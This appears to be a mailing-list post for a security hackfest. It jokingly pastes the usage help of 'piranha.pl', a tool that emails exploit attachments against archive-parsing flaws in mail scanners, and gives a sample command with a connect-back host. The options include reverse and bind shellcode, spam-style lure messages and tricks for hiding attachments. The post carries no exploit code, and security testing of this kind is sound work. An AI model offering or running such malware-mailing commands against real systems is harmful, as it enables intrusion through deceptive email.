Send some Christmas cards: $ piranha.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a myname@mydomain.com Usage: piranha.pl [MANDATORY ARGS] [OPTIONAL ARGS] Mandatory arguments: -e+ Exploit number to use (See below) -h+ SMTP server to test -a+ Destination email address used in probing Optional arguments: -s+ Shellcode type to inject into exploits (See below) -c+ Cloaking style (See below) -d+ Try to vanish attachments from MUA's view (See below) -v Attach EICAR virus to improve stealthness -z Pack all the malware into a tarball to be less noisy -p+ Port to use in reverse shell or bind shell -l+ Host to connect back in reverse shell mode Valid exploits numbers: 0 OSVDB #5753: LHA get_header File Name Overflow 1 OSVDB #5754: LHA get_header Directory Name Overflow 2 OSVDB #6456: file readelf.c tryelf() ELF Header Overflow 3 OSVDB #11695: unarj Filename Handling Overflow 4 OSVDB #23460: ZOO combine File and Dir name overflow 5 OSVDB #15867: Convert UUlib uunconc integer overflow 6 OSVDB #XXX: ZOO next offset infinite loop DoS Valid shellcode types: 0 TCP reverse shell 1 UDP reverse shell 2 TCP bind shell Valid cloaking styles (consult whitepaper for visual result): 0 No cloaking at all (default) 1 Viagra spam message 2 "Look at the pictures I promised you!" Vanishing techniques for attachments: 0 No vanishing at all (default) 1 Multipart/alternative trick 2 trick www.Obnosis.com | http://en.wiktionary.org/wiki/Citations:obnosis | hackfest.obnosis.com (503)754-4452 January PLUG HackFest = Kristy Westphal, AZ Department of Economic Security Forensics @ UAT 1/10/09 12-3PM Take the Black [Linux XP/Vista BackTrack3] Pill & leave SecurityMatrix, or take the Blue [XP/Vista Update] Pill & stay happily ignorant. http://uncyclopedia.wikia.com/wiki/Satan_Claus _________________________________________________________________ Send e-mail anywhere. No map, no compass. http://windowslive.com/oneline/hotmail?ocid=TXT_TAGLM_WL_hotmail_acq_anywhere_122008